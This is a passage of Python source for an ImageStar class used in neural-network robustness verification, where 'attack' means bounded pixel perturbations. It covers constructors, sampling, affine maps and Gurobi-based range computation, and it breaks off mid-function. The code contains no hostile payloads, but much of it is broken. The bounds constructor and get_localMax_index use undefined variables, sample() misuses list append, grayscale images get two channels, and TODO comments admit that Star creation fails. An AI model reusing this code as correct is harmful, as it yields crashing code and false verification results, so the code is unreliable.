# attack.\n #\n # Under attack we have: -0.1 + 1 <= IM(1,1) <= 1 + 0.1\n # -0.2 + 1 <= IM(1,2) <= 1 + 0.2\n # -0.05 <= IM(2,4) <= 0.05\n #\n # To represent the attacked image we use IM, LB, UB matrices\n # For multi-channel image we use multi-dimensional array IM, LB, UB\n # to represent the attacked image. \n # For example, for an attacked color image with 3 channels we have\n # IM(:, :, 1) = IM1, IM(:,:,2) = IM2, IM(:,:,3) = IM3\n # LB(:, :, 1) = LB1, LB(:,:,2) = LB2, LB(:,:,3) = LB3\n # UB(:, :, 1) = UB1, UB(:,:,2) = UB2, UB(:,:,3) = UB3\n # \n # The image object is: image = ImageStar(IM, LB, UB)\n #=================================================================\n\n # 2D representation of an ImageStar\n # ====================================================================\n # Definition of Star2D\n # \n # A 2D star set S is defined by: \n # S = {x| x = V[0] + a[1]*V[1] + a[2]*V[2] + ... + a[n]*V[n]\n # = V * b, V = {c V[1] V[2] ... V[n]}, \n # b = [1 a[1] a[2] ... a[n]]^T \n # where C*a <= d, constraints on a[i]}\n # where, V[0], V[i] are 2D matrices with the same dimension, i.e., \n # V[i] \\in R^{m x n}\n # V[0] : is called the center matrix and V[i] is called the basic matrix \n # [a[1]...a[n] are called predicate variables\n # C: is the predicate constraint matrix\n # d: is the predicate constraint vector\n # \n # The notion of Star2D is more general than the original Star set where\n # the V[0] and V[i] are vectors. \n # \n # Dimension of Star2D is the dimension of the center matrix V[0]\n # \n # ====================================================================\n\n\n def __init__(self, *args):\n \"\"\"\n Constructor using 2D representation / 1D representation of an ImageStar\n \n args : np.array([params]) -> a list of initial arguments\n \n params can inlude =>\n \n ================ First initialization option ================\n V : np.array([]) -> a cell (size = numPred)\n C : np.array([]) -> a constraints matrix of the predicate\n d : np.array([]) -> a constraints vector of the predicate\n pred_lb : np.array([]) -> lower bound vector of the predicate\n pred_ub : np.array([]) -> upper bound vector of the predicate\n im_lb : np.array([]) -> lower bound image of the ImageStar\n im_ub : np.array([]) -> upper bound image of the ImageStar\n =============================================================\n \n ================ Second initialization option ================\n V : np.array([]) -> a cell (size = numPred)\n C : np.array([]) -> a constraints matrix of the predicate\n d : np.array([]) -> a constraints vector of the predicate\n pred_lb : np.array([]) -> lower bound vector of the predicate\n pred_ub : np.array([]) -> upper bound vector of the predicate\n =============================================================\n \n ================ Third initialization option ================\n IM : np.array([]) -> center image (high-dimensional array)\n LB : np.array([]) -> lower bound of attack (high-dimensional array)\n UB : np.array([]) -> upper bound of attack (high-dimensional array\n =============================================================\n \"\"\"\n \n self.validate_params(args)\n \n self.attributes = [] \n \n for i in range(IMAGESTAR_ATTRIBUTES_NUM):\n self.attributes.append(np.array([]))\n \n self.scalar_attributes_ids = [\n NUMPRED_ID, HEIGHT_ID, WIDTH_ID, NUM_CHANNEL_ID\n ]\n \n self.attributes[FLATTEN_ORDER_ID] = COLUMN_FLATTEN\n \n if len(args) == PREDICATE_IMGBOUNDS_INIT_ARGS_NUM or len(args) == PREDICATE_INIT_ARGS_NUM: \n if np.size(args[V_ID]) and np.size(args[C_ID]) and np.size(args[D_ID]) and np.size(args[PREDLB_ID]) and np.size(args[PREDUB_ID]):\n assert (args[C_ID].shape[0] == 1 and np.size(args[D_ID]) == 1) or (args[C_ID].shape[0] == args[D_ID].shape[0]), \\\n 'error: %s' % ERRMSG_INCONSISTENT_CONSTR_DIM\n \n assert (np.size(args[D_ID]) == 1) or (len(np.shape(args[D_ID])) == 1), 'error: %s' % ERRMSG_INVALID_CONSTR_VEC\n \n self.attributes[NUMPRED_ID] = args[C_ID].shape[1];\n self.attributes[C_ID] = args[C_ID].astype('float64')\n self.attributes[D_ID] = args[D_ID].astype('float64')\n \n assert args[C_ID].shape[1] == args[PREDLB_ID].shape[0] == args[PREDUB_ID].shape[0], 'error: %s' % ERRMSG_INCONSISTENT_PRED_BOUND_DIM\n \n assert len(args[PREDLB_ID].shape) == len(args[PREDUB_ID].shape) == 1 or args[PREDUB_ID].shape[1], 'error: %s' % ERRMSG_INCONSISTENT_BOUND_DIM\n \n self.attributes[PREDLB_ID] = args[PREDLB_ID].astype('float64')\n self.attributes[PREDUB_ID] = args[PREDUB_ID].astype('float64')\n \n n = args[V_ID].shape\n \n if len(n) < 2:\n raise Exception('error: %s' % ERRMSG_INVALID_BASE_MATRIX)\n else:\n self.attributes[HEIGHT_ID] = n[0]\n self.attributes[WIDTH_ID] = n[1]\n \n self.attributes[V_ID] = args[V_ID]\n \n if len(n) == 4:\n assert n[3] == self.attributes[NUMPRED_ID] + 1, 'error: %s' % ERRMSG_INCONSISTENT_BASIS_MATRIX_PRED_NUM\n \n self.attributes[NUM_CHANNEL_ID] = n[2]\n else:\n # TODO: ASK WHY THIS HAPPENS AFTER THE ASSIGNMENT IN LINE 205\n #self.attributes[NUMPRED_ID] = 0\n \n if len(n) == 3:\n self.attributes[NUM_CHANNEL_ID] = n[2]\n elif len(n) == 2:\n self.attributes[NUM_CHANNEL_ID] = 1\n \n if len(args) == PREDICATE_IMGBOUNDS_INIT_ARGS_NUM: \n if args[IM_LB_ID].shape[0] != 0 and (args[IM_LB_ID].shape[0] != self.attributes[HEIGHT_ID] or args[IM_LB_ID].shape[1] != self.attributes[WIDTH_ID]):\n raise Exception('error: %s' % ERRMSG_INCONSISTENT_LB_DIM)\n else:\n self.attributes[IM_LB_ID] = args[IM_LB_ID].astype('float64') \n \n if args[IM_UB_ID].shape[0] != 0 and (args[IM_UB_ID].shape[0] != self.attributes[HEIGHT_ID] or args[IM_UB_ID].shape[1] != self.attributes[WIDTH_ID]):\n raise Exception('error: %s' % ERRMSG_INCONSISTENT_UB_DIM)\n else:\n self.attributes[IM_UB_ID] = args[IM_UB_ID].astype('float64')\n \n elif len(args) == IMAGE_INIT_ARGS_NUM:\n args = self.offset_args(args, IMAGE_INIT_ARGS_OFFSET)\n if np.size(args[IM_ID]) and np.size(args[LB_ID]) and np.size(args[UB_ID]) and args[V_ID].shape[0] == 0:\n n = args[IM_ID].shape\n l = args[LB_ID].shape\n u = args[UB_ID].shape\n \n assert (n[0] == l[0] == u[0] and n[1] == l[1] == u[1]) and (len(n) == len(l) == len(u)), 'error: %s' % ERRMSG_INCONSISTENT_CENTER_IMG_ATTACK_MATRIX\n \n assert len(n) == len(l) == len(u), 'error: %s' % ERRMSG_INCONSISTENT_CHANNELS_NUM\n \n self.attributes[IM_ID] = args[IM_ID].astype('float64')\n self.attributes[LB_ID] = args[LB_ID].astype('float64')\n self.attributes[UB_ID] = args[UB_ID].astype('float64')\n \n self.attributes[HEIGHT_ID] = n[0]\n self.attributes[WIDTH_ID] = n[1]\n \n if len(n) == 2:\n self.attributes[NUM_CHANNEL_ID] = 2\n elif len(n) == 3:\n self.attributes[NUM_CHANNEL_ID] = 3\n else:\n raise Exception('error: %s' % ERRMSG_INCONSISTENT_CHANNELS_NUM)\n \n self.attributes[IM_LB_ID] = self.attributes[IM_ID] + self.attributes[LB_ID]\n self.attributes[IM_UB_ID] = self.attributes[IM_ID] + self.attributes[UB_ID]\n \n n = self.attributes[IM_LB_ID].shape\n \n I = 0\n \n if len(n) == 3:\n #TODO: Star returns 'can't create Star set' error because StarV Star constructor initialization does not correspond to the implementation in NNV\n I = Star(self.attributes[IM_LB_ID].flatten(order=self.attributes[FLATTEN_ORDER_ID]), self.attributes[IM_UB_ID].flatten(order=self.attributes[FLATTEN_ORDER_ID]))\n self.attributes[V_ID] = np.reshape(I.V, (I.nVar + 1, n[0] * n[1] * n[2]))\n else:\n I = Star(self.attributes[IM_LB_ID].flatten(order=self.attributes[FLATTEN_ORDER_ID]), self.attributes[IM_UB_ID].flatten(order=self.attributes[FLATTEN_ORDER_ID]))\n self.attributes[V_ID] = np.reshape(I.V, (I.nVar + 1, n[0] * n[1]))\n \n self.attributes[C_ID] = I.C\n self.attributes[D_ID] = I.d\n \n # TODO: ask why does Star have predicate_lb and ImageStar pred_lb?\n self.attributes[PREDLB_ID] = I.predicate_lb\n self.attributes[PREDUB_ID] = I.predicate_ub\n \n self.attributes[NUMPRED_ID] = I.nVar\n elif len(args) == BOUNDS_INIT_ARGS_NUM:\n args = self.offset_args(args, BOUNDS_INIT_ARGS_OFFSET)\n if np.size(args[IM_LB_ID]) and np.size(args[IM_UB_ID]) and args[V_ID].shape[0] == 0: #and np.shape(args[IM_ID])[0] == 0:\n lb_shape = args[IM_LB_ID].shape\n ub_shape = args[IM_UB_ID].shape\n \n assert len(lb_shape) == len(ub_shape), 'error: %s' % ERRMSG_INCONSISTENT_LB_UB_DIM\n \n for i in range(len(lb_shape)):\n assert lb_shape[i] == ub_shape[i], 'error: %s' % ERRMSG_INCONSISTENT_LB_UB_DIM\n \n lb = args[IM_LB_ID].flatten(order=self.attributes[FLATTEN_ORDER_ID])\n ub = args[IM_UB_ID].flatten(order=self.attributes[FLATTEN_ORDER_ID])\n \n #TODO: Star returns 'can't create Star set' error because StarV Star constructor initialization does not correspond to the implementation in NNV \n S = Star(lb, ub)\n \n self.copy_deep(S.toImageStar)\n \n self.attributes[IM_LB_ID] = lb_im.astype('float64')\n self.attributes[IM_UB_ID] = im_ub.astype('float64')\n elif self.isempty_init(args):\n self.init_empty_imagestar()\n else:\n raise Exception('error: %s' % ERRMSG_INVALID_INIT)\n \n def sample(self, N):\n \"\"\"\n Rangomly generates a set of images from an imagestar set\n \n N : int -> number of images\n return -> set of images\n \"\"\"\n \n assert (not self.isempty(self.attributes[V_ID])), 'error: %s' % ERRMSG_IMGSTAR_EMPTY\n \n if self.isempty(self.attributes[C_ID]) or self.isempty(self.attributes[D_ID]):\n return self.attributes[IM_ID]\n else:\n new_V = np.hstack((np.zeros((self.attributes[NUMPRED_ID], 1)), np.eye(self.attributes[NUMPRED_ID])))\n #TODO: Star returns an error when checking the dimensions even though they match\n S = Star(new_V, self.attributes[C_ID], self.attributes[D_ID])\n pred_samples = S.sample(N)\n \n images = []\n \n for i in range(len(pred_samples)):\n images.append(images, np.array(self.evaluate(pred_samples[:, i])))\n \n return images\n \n def evaluate(self, pred_val):\n \"\"\"\n Evaluate an ImageStar with specific values of predicates\n \n pred_val : *int -> a vector of predicate variables\n return -> evaluated image\n \"\"\" \n \n assert (not self.isempty(self.attributes[V_ID])), 'error: %s' % ERRMSG_IMGSTAR_EMPTY\n \n assert len(pred_val.shape) == 1, 'error: %s' % ERRMSG_INVALID_PREDICATE_VEC\n \n assert pred_val.shape[0] == self.attributes[NUMPRED_ID], 'error: %s' % ERRMSG_INCONSISTENT_PREDVEC_PREDNUM\n \n image = np.zeros((self.attributes[HEIGHT_ID], self.attributes[WIDTH_ID], self.attributes[NUM_CHANNEL_ID]))\n \n for i in range(self.attributes[NUM_CHANNEL_ID]):\n image[:, :, i] = self.attributes[V_ID][:, :, i, 1]\n \n for j in range(2, self.attributes[NUMPRED_ID] + 1):\n image[:, :, i] = image[:, :, i] + pred_val[j - 1] * self.attributes[V_ID][:, :, i, j]\n \n return image\n \n def affine_map(self, scale, offset):\n \"\"\"\n Performs affine mapping of the ImageStar: y = scale * x + offset\n \n scale : *float -> scale coefficient [1 x 1 x num_channel] array\n offset : *float -> offset coefficient [1 x 1 x num_channel] array\n return -> a new ImageStar\n \"\"\"\n \n assert (self.isempty(scale) or self.is_scalar(scale) or len(scale.shape) == self.attributes[NUM_CHANNEL_ID]), 'error: %s' % ERRMSG_INCONSISTENT_SCALE_CHANNELS_NUM\n \n new_V = 0\n \n if not self.isempty(scale):\n new_V = np.multiply(scale, self.attributes[V_ID])\n else:\n new_V = self.attributes[V_ID]\n \n # Affine Mapping changes the center\n if not self.isempty(offset):\n new_V[:, :, :, 0] = new_V[:, :, :, 0] + offset\n \n return ImageStar(new_V, self.attributes[C_ID], self.attributes[D_ID], self.attributes[PREDLB_ID], self.attributes[PREDUB_ID])\n \n def to_star(self):\n \"\"\"\n Converts current ImageStar to Star\n \n return -> created Star\n \"\"\"\n \n pixel_num = self.attributes[HEIGHT_ID] * self.attributes[WIDTH_ID] * self.attributes[NUM_CHANNEL_ID]\n \n new_V = np.zeros((pixel_num, self.attributes[NUMPRED_ID] + 1))\n \n if self.isempty(new_V):\n # TODO: error: failed to create Star set\n return Star()\n else:\n for j in range(self.attributes[NUMPRED_ID] + 1):\n #new_V[:, j] = np.reshape(self.attributes[V_ID][:, :, :, j], (pixel_num, 0))\n new_V[:, j] = self.attributes[V_ID][:, :, :, j].flatten(order=self.attributes[FLATTEN_ORDER_ID])\n \n if not self.isempty(self.attributes[IM_LB_ID]) and not self.isempty(self.attributes[IM_UB_ID]):\n state_lb = self.attributes[IM_LB_ID].flatten(order=self.attributes[FLATTEN_ORDER_ID])\n state_ub = self.attributes[IM_UB_ID].flatten(order=self.attributes[FLATTEN_ORDER_ID])\n \n # TODO: error: failed to create Star set\n S = Star(new_V, self.attributes[C_ID], self.attributes[D_ID], self.attributes[PREDLB_ID], self.attributes[PREDUB_ID], state_lb, state_ub)\n else:\n # TODO: error: failed to create Star set\n S = Star(new_V, self.attributes[C_ID], self.attributes[D_ID], self.attributes[PREDLB_ID], self.attributes[PREDUB_ID])\n \n return S\n \n def is_empty_set(self):\n \"\"\"\n Checks if the ImageStar is empty\n \n return -> True if empty, False if isn't empty\n \"\"\"\n \n S = self.to_star()\n return S.isEmptySet()\n \n def contains(self, image):\n \"\"\"\n Checks if the ImageStar contains the image\n \n image : *float -> input image\n return -> = 1 if the ImageStar contain the image\n = 0 if the ImageStar does not contain the image\n \"\"\"\n \n img_size = image.shape\n \n if len(img_size) == 2: # one channel image\n assert (img_size[0] == self.attributes[HEIGHT_ID] and img_size[1] == self.attributes[WIDTH_ID] and self.attributes[NUM_CHANNEL_ID] == 1), 'error: %s' % ERRMSG_INCONSISTENT_IMGDIM_IMGSTAR\n elif len(img_size) == 3:\n assert (img_size[0] == self.attributes[HEIGHT_ID] and img_size[1] == self.attributes[WIDTH_ID] and img_size[2] == self.attributes[NUM_CHANNEL_ID]), 'error: %s' % ERRMSG_INCONSISTENT_IMGDIM_IMGSTAR\n else:\n raise Exception('error: %s' % ERRMSG_INVALID_INPUT_IMG)\n \n image_vec = image.flatten(order=self.attributes[FLATTEN_ORDER_ID])\n \n # TODO: error: failed to create Star set\n S = self.to_star()\n \n return S.contains(image_vec)\n \n def project2D(self, point1, point2):\n \"\"\"\n Projects the ImageStar on the give plane\n \n point1 : int -> first dimension index\n point2 : int -> first dimension index\n return -> projected Star\n \"\"\"\n \n assert (len(point1) == 3 and len(point2) == 3), 'error: %s' % ERRMSG_INVALID_INPUT_POINT\n assert self.validate_point_dim(point1, self.attributes[HEIGHT_ID], self.attributes[WIDTH_ID]), 'error: %s' % ERRMSG_INVALID_FIRST_INPUT_POINT\n assert self.validate_point_dim(point2, self.attributes[HEIGHT_ID], self.attributes[WIDTH_ID]), 'error: %s' % ERRMSG_INVALID_SECOND_INPUT_POINT\n \n point1 -= 1\n point2 -= 1\n \n n = self.attributes[NUMPRED_ID] + 1\n \n new_V = np.zeros((2, n))\n \n for i in range(n):\n new_V[0, i] = self.attributes[V_ID][point1[0], point1[1], point1[2], i]\n new_V[1, i] = self.attributes[V_ID][point2[0], point2[1], point2[2], i]\n \n return Star(new_V, self.attributes[C_ID], self.attributes[D_ID], self.attributes[PREDLB_ID], self.attributes[PREDUB_ID])\n \n \n def get_range(self, *args):\n \"\"\"\n Gets ranges of a state at specific position using the Gurobi solver\n \n args : np.array([params]) -> multimple parameters that include =>\n vert_id : int -> vertica index\n horiz_id : int -> horizontall index\n channel_id : int -> channel index\n \n \n \n return : np.array([\n xmin : int -> min of (vert_id, horiz_id, channel_id),\n xmax : int -> max of (vert_id, horiz_id, channel_id)\n ])\n \"\"\"\n \n assert (len(args) == DEFAULT_SOLVER_ARGS_NUM or len(args) == CUSTOM_SOLVER_ARGS_NUM), 'error: %s' % ERRMSG_GETRANGES_INVALID_ARGS_NUM \n assert (not self.isempty(self.attributes[C_ID]) and not self.isempty(self.attributes[D_ID])), 'error: %s' % ERRMSG_IMGSTAR_EMPTY\n \n # TODO: THIS SHOULD BE ACCOUNTED FOR WHEN THE DATA IS PASSED\n # input_args = np.array([\n # args[VERT_ID] - 1,\n # args[HORIZ_ID] - 1,\n # args[CHANNEL_ID] - 1\n # ], dtype=int)\n \n #input_args = input_args + 1\n \n # TODO: account for potential custom solver identifier\n #args = input_args\n \n assert (args[VERT_ID] > -1 and args[VERT_ID] < self.attributes[HEIGHT_ID]), 'error: %s' % ERRMSG_INVALID_VERT_ID\n assert (args[HORIZ_ID] > -1 and args[HORIZ_ID] < self.attributes[WIDTH_ID]), 'error: %s' % ERRMSG_INVALID_HORIZ_ID\n assert (args[CHANNEL_ID] > -1 and args[CHANNEL_ID] < self.attributes[NUM_CHANNEL_ID]), 'error: %s' % ERRMSG_INCONSISTENT_CHANNELS_NUM\n \n bounds = [np.array([]), np.array([])]\n \n f = self.attributes[V_ID][args[VERT_ID], args[HORIZ_ID], args[CHANNEL_ID], 1:self.attributes[NUMPRED_ID] + 1]\n \n if (f == 0).all():\n bounds[XMIN_ID] = self.attributes[V_ID][args[VERT_ID], args[HORIZ_ID], args[CHANNEL_ID], 0]\n bounds[XMAX_ID] = self.attributes[V_ID][args[VERT_ID], args[HORIZ_ID], args[CHANNEL_ID], 0]\n else:\n min_ = gp.Model()\n min_.Params.LogToConsole = 0\n min_.Params.OptimalityTol = 1e-9\n if self.attributes[PREDLB_ID].size and self.attributes[PREDUB_ID].size:\n x = min_.addMVar(shape=self.attributes[NUMPRED_ID], lb=self.attributes[PREDLB_ID], ub=self.attributes[PREDUB_ID])\n else:\n x = min_.addMVar(shape=self.attributes[NUMPRED_ID])\n min_.setObjective(f @ x, GRB.MINIMIZE)\n C = sp.csr_matrix(self.attributes[C_ID])\n d = np.array(self.attributes[D_ID]).flatten(order=self.attributes[FLATTEN_ORDER_ID])\n min_.addConstr(C @ x <= d)\n min_.optimize()\n\n if min_.status == 2:\n xmin = min_.objVal + self.attributes[V_ID][args[VERT_ID], args[HORIZ_ID], args[CHANNEL_ID], 0]\n else:\n raise Exception('error: cannot find an optimal solution, exitflag = %d' % (min_.status))\n\n max_ = gp.Model()\n max_.Params.LogToConsole = 0\n max_.Params.OptimalityTol = 1e-9\n if self.attributes[PREDLB_ID].size and self.attributes[PREDUB_ID].size:\n x = max_.addMVar(shape=self.attributes[NUMPRED_ID], lb=self.attributes[PREDLB_ID], ub=self.attributes[PREDUB_ID])\n else:\n x = max_.addMVar(shape=self.attributes[NUMPRED_ID])\n max_.setObjective(f @ x, GRB.MAXIMIZE)\n C = sp.csr_matrix(self.attributes[C_ID])\n d = np.array(self.attributes[D_ID]).flatten(order=self.attributes[FLATTEN_ORDER_ID])\n max_.addConstr(C @ x <= d)\n max_.optimize()\n\n if max_.status == 2:\n xmax = max_.objVal + self.attributes[V_ID][args[VERT_ID], args[HORIZ_ID], args[CHANNEL_ID], 0]\n else:\n raise Exception('error: cannot find an optimal solution, exitflag = %d' % (max_.status))\n\n return np.array([xmin, xmax])\n\n def estimate_range(self, height_id, width_id, channel_id):\n \"\"\"\n Estimates a range using only a predicate bounds information\n \n h : int -> height index\n w : int -> width index\n c : int -> channel index\n \n return -> [xmin, xmax]\n \"\"\"\n\n assert (not self.isempty(self.attributes[C_ID]) and not self.isempty(self.attributes[D_ID])), 'error: %s' % ERRMSG_IMGSTAR_EMPTY\n \n height_id = int(height_id)\n width_id = int(width_id)\n channel_id = int(channel_id)\n \n assert (height_id > -1 and height_id < self.attributes[HEIGHT_ID]), 'error: %s' % ERRMSG_INVALID_VERT_ID\n assert (width_id > -1 and width_id < self.attributes[WIDTH_ID]), 'error: %s' % ERRMSG_INVALID_HORIZ_ID\n assert (channel_id > -1 and channel_id < self.attributes[NUM_CHANNEL_ID]), 'error: %s' % ERRMSG_INVALID_CHANNEL_ID \n \n f = self.attributes[V_ID][height_id, width_id, channel_id, 0:self.attributes[NUMPRED_ID] + 1]\n xmin = f[0]\n xmax = f[0]\n \n for i in range(1, self.attributes[NUMPRED_ID] + 1):\n if f[i] >= 0:\n xmin = xmin + f[i] * self.attributes[PREDLB_ID][i - 1]\n xmax = xmax + f[i] * self.attributes[PREDUB_ID][i - 1]\n else:\n xmin = xmin + f[i] * self.attributes[PREDUB_ID][i - 1]\n xmax = xmax + f[i] * self.attributes[PREDLB_ID][i - 1]\n\n return np.array([xmin, xmax])\n\n def estimate_ranges(self, dis_opt = DEFAULT_DISP_OPTION):\n \"\"\"\n Estimates the ranges using only a predicate bound information\n \n dis_opt : string -> display option\n \n return -> [image_lb, image_ub]\n \"\"\"\n \n assert (not self.isempty(self.attributes[C_ID]) and not self.isempty(self.attributes[D_ID])), 'error: %s' % ERRMSG_IMGSTAR_EMPTY\n \n if self.isempty(self.attributes[IM_LB_ID]) or self.isempty(self.attributes[IM_UB_ID]):\n image_lb = np.zeros((self.attributes[HEIGHT_ID], self.attributes[WIDTH_ID], self.attributes[NUM_CHANNEL_ID]))\n image_ub = np.zeros((self.attributes[HEIGHT_ID], self.attributes[WIDTH_ID], self.attributes[NUM_CHANNEL_ID]))\n \n size = self.attributes[HEIGHT_ID] * self.attributes[WIDTH_ID] * self.attributes[NUM_CHANNEL_ID]\n \n disp_flag = False\n if dis_opt == DISPLAY_ON_OPTION:\n disp_flag = True\n print(ESTIMATE_RANGE_STAGE_STARTED)\n \n for i in range(self.attributes[HEIGHT_ID]):\n for j in range(self.attributes[WIDTH_ID]):\n for k in range(self.attributes[NUM_CHANNEL_ID]):\n image_lb[i, j, k], image_ub[i, j, k] = self.estimate_range(i, j, k)\n \n if disp_flag:\n print(ESTIMATE_RANGE_STAGE_OVER)\n \n self.attributes[IM_LB_ID] = image_lb\n self.attributes[IM_UB_ID] = image_ub\n else:\n image_lb = self.attributes[IM_LB_ID]\n image_ub = self.attributes[IM_UB_ID]\n \n return np.array([image_lb, image_ub])\n \n def get_ranges(self, dis_opt = DEFAULT_DISP_OPTION):\n \"\"\"\n Computes the lower and upper bound images of the ImageStar\n \n return -> [image_lb : np.array([]) -> lower bound image,\n image_ub : np.array([]) -> upper bound image]\n \"\"\"\n \n image_lb = np.zeros((self.attributes[HEIGHT_ID], self.attributes[WIDTH_ID], self.attributes[NUM_CHANNEL_ID]))\n image_ub = np.zeros((self.attributes[HEIGHT_ID], self.attributes[WIDTH_ID], self.attributes[NUM_CHANNEL_ID]))\n\n size = self.attributes[HEIGHT_ID] * self.attributes[WIDTH_ID] * self.attributes[NUM_CHANNEL_ID]\n \n disp_flag = False\n if dis_opt == DISPLAY_ON_OPTION:\n disp_flag = True\n print(ESTIMATE_RANGE_STAGE_STARTED)\n \n for i in range(self.attributes[HEIGHT_ID]):\n for j in range(self.attributes[WIDTH_ID]):\n for k in range(self.attributes[NUM_CHANNEL_ID]):\n image_lb[i, j, k], image_ub[i, j, k] = self.get_range(i, j, k)\n \n if disp_flag:\n print(ESTIMATE_RANGE_STAGE_OVER)\n \n self.attributes[IM_LB_ID] = image_lb\n self.attributes[IM_UB_ID] = image_ub\n \n return np.array([image_lb, image_ub])\n \n def update_ranges(self, *args):\n \"\"\"\n Updates local ranges for the MaxPooling operation\n \n points : np.array([*]) -> local points = [x1 y1 c1; x2 y2 c2; ...]\n \"\"\"\n updated_ranges = []\n \n for i in range(len(args[POINTS_ID])):\n updated_ranges.append(self.get_range(args[POINTS_ID][i][0], args[POINTS_ID][i][1], args[POINTS_ID][i][2]))\n \n return updated_ranges\n \n \n \n def get_num_attacked_pixels(self):\n \"\"\"\n Computes the number of attacked pixels in the ImageStar\n \n return : int -> the number of pixels\n \"\"\"\n \n V1 = np.zeros((self.attributes[HEIGHT_ID], self.attributes[WIDTH_ID], self.attributes[NUM_CHANNEL_ID]))\n V3 = V1\n \n for i in range(1, self.attributes[NUMPRED_ID] + 1):\n V2 = (self.attributes[V_ID][:,:,:,i] != V1)\n V3 = V3 + V2\n \n V4 = np.amax(V3, 2)\n return sum(sum(V4))\n \n def get_local_bound(self, *args):\n \"\"\"\n Computes the local bound for the Max Pooling operation\n \n args : np.array([]) that includes =>\n start_point : np.array([x1, y1]) -> the start point of the local (partial) image\n pool_size : np.array([height, width]) -> the height and width of max pooling\n channel_id : int -> the index of the channel\n \n return : [lb : np.array([*]) -> the lower bound of all points in the local region,\n ub : np.array([*]) -> the upper bound of all points in the local region]\n \n \"\"\"\n \n points = self.get_local_points(args[START_POINT_ID], args[POOL_SIZE_ID])\n points_num = len(points)\n \n if self.isempty(self.attributes[IM_LB_ID]) or self.isempty(self.attributes[IM_UB_ID]):\n image_lb, image_ub = self.get_ranges()\n else:\n image_lb = self.attributes[IM_LB_ID]\n image_ub = self.attributes[IM_UB_ID]\n \n lb = image_lb[int(points[0,0]), int(points[0,1]), self.attributes[NUM_CHANNEL_ID] - 1]\n ub = image_ub[int(points[0,0]), int(points[0,1]), self.attributes[NUM_CHANNEL_ID] - 1]\n \n for i in range(1, points_num):\n if image_lb[int(points[i,0]), int(points[i,1]), self.attributes[NUM_CHANNEL_ID] - 1] < lb:\n lb = image_lb[int(points[i,0]), int(points[i,1]), self.attributes[NUM_CHANNEL_ID] - 1]\n \n if image_ub[int(points[i,0]), int(points[i,1]), self.attributes[NUM_CHANNEL_ID] - 1] > ub:\n ub = image_ub[int(points[i,0]), int(points[i,1]), self.attributes[NUM_CHANNEL_ID] - 1]\n \n return [lb, ub]\n \n def get_local_points(self, start_point, pool_size):\n \"\"\"\n Computes all local points indices for Max Pooling operation\n \n start_point : np.array([x1, y1]) -> the start point of the local (partial) image\n pool_size : np.array([height, width]) -> the height and width of max pooling\n \n returns : np.array([*]) -> all indices of the points for a single max pooling operation\n (includeing the start point)\n \"\"\"\n \n x0 = start_point[0] # vertical index of the startpoint\n y0 = start_point[1] # horizontal index of the startpoint\n \n h = pool_size[0] # height of the MaxPooling layer\n w = pool_size[1] # width of the MaxPooling layer\n \n assert (x0 >= 0 and y0 >= 0 and x0 + h - 1 < self.attributes[HEIGHT_ID] \\\n and y0 + w - 1 < self.attributes[WIDTH_ID]), \\\n 'error: %s' % ERRMSG_INVALID_STARTPOINT_POOLSIZE \n \n points = np.zeros((h * w, 2))\n \n for i in range(h):\n if i == 0:\n x1 = x0\n else:\n x1 = x1 + 1\n \n for j in range(w):\n if j==0:\n y1 = y0;\n else:\n y1 = y1 + 1;\n \n points[i * w + j, :] = np.array([x1, y1])\n \n return points\n \n def get_localMax_index(self, *args):\n \"\"\"\n Gets local max index. Attempts to find the maximum point of the local image.\n It's used in over-approximate reachability analysis of the maxpooling operation\n \n startpoints : np.array([int, int]) -> startpoint of the local image\n pool_size : np.array([int, int]) -> the height and width of the max pooling layer\n channel_id : int -> the channel index\n \n return -> max_id\n \"\"\"\n \n points = self.get_local_points(args[START_POINT_ID], args[POOL_SIZE_ID])\n \n if self.isempty(self.attributes[IM_LB_ID]) or self.isempty(self.attributes[IM_UB_ID]):\n self.estimate_ranges()\n \n height = args[POOL_SIZE_ID][0]\n width = args[POOL_SIZE_ID][0]\n size = height * width\n \n lb = np.zeros((size, 1))\n ub = np.zeros((size, 1))\n \n for i in range(size):\n current_point = points[i, :].astype(int)\n \n lb[i] = self.attributes[IM_LB_ID][current_point[0], current_point[1], args[CHANNEL_ID] - 1]\n ub[i] = self.attributes[IM_UB_ID][current_point[0], current_point[1], args[CHANNEL_ID] - 1]\n \n \n [max_lb_id, max_lb_val] = max(enumerate(lb), key=operator.itemgetter(1))\n \n a = np.argwhere((ub - max_lb_val) > 0)[:,0]\n a1 = np.argwhere((ub - max_lb_val) >= 0)[:,0]\n a = np.delete(a, np.argwhere(a==max_lb_id)[:,0])\n \n if self.isempty(a):\n max_id = points[max_lb_id, :]\n else:\n candidates = a1\n \n candidates_num = len(candidates)\n \n new_points = []\n new_points1 = np.zeros((candidates_num, 2))\n \n for i in range(candidates_num):\n selected_points = points[candidates[i], :]\n new_points.append(np.append(selected_points, args[CHANNEL_ID] - 1))\n new_points1[i, :] = selected_points\n \n self.update_ranges(new_points)\n \n lb = np.zeros((candidates_num,1))\n ub = np.zeros((candidates_num,1))\n \n for i in range(candidates_num):\n #TODO: THIS SHOULD BE INITIALLY INT\n current_point = points[candidates[i], :]\n \n lb[i] = self.attributes[IM_LB_ID][int(current_point[0]), int(current_point[1]), int(args[CHANNEL_ID])]\n ub[i] = self.attributes[IM_UB_ID][int(current_point[0]), int(current_point[1]), int(args[CHANNEL_ID])]\n \n [max_lb_id, max_lb_val] = max(enumerate(lb), key=operator.itemgetter(1))\n \n a = np.argwhere((ub - max_lb_val) > 0)[:,0]\n a = np.delete(a, np.argwhere(a==max_lb_id)[:,0])\n \n if self.isempty(a):\n max_id = new_points1[max_lb_val, :]\n else:\n candidates1 = (ub - max_lb_val) >= 0\n max_id = new_points1[max_lb_id, :]\n \n candidates1[candidates1 == max_lb_id] == []\n candidates_num = len(candidates1)\n \n max_id1 = max_id\n \n for j in range(candidates_num):\n p1 = new_points[candidates1[j], :]\n \n if self.is_p1_larger_p2(np.array([p1[0], p2[1], args[CHANNEL_ID]]), \\\n np.array([max_id[0], max_id[1], args[CHANNEL_ID]])):\n max_id1 = np.array([max_ids1, p1])\n \n \n max_id = max_id1\n \n print('\\nThe local image has %d max candidates: \\t%d' % np.size(max_id, 0))\n \n return np.append(max_id, args[CHANNEL_ID] * np.zeros((len(max_id.shape)))).tolist()\n \n def get_localMax_index2(self, start_point, pool_size, channel_id):\n \"\"\"\n Gets local max index. Attempts to find the maximum point of the local image.\n It's used in over-approximate reachability analysis of the maxpooling operation\n \n startpoints : np.array([int, int]) -> startpoint of the local image\n pool_size : np.array([int, int]) -> the height and width of the max pooling layer\n channel_id : int -> the channel index\n \n return -> max_id\n \"\"\"\n \n points = self.get_local_points(start_point, 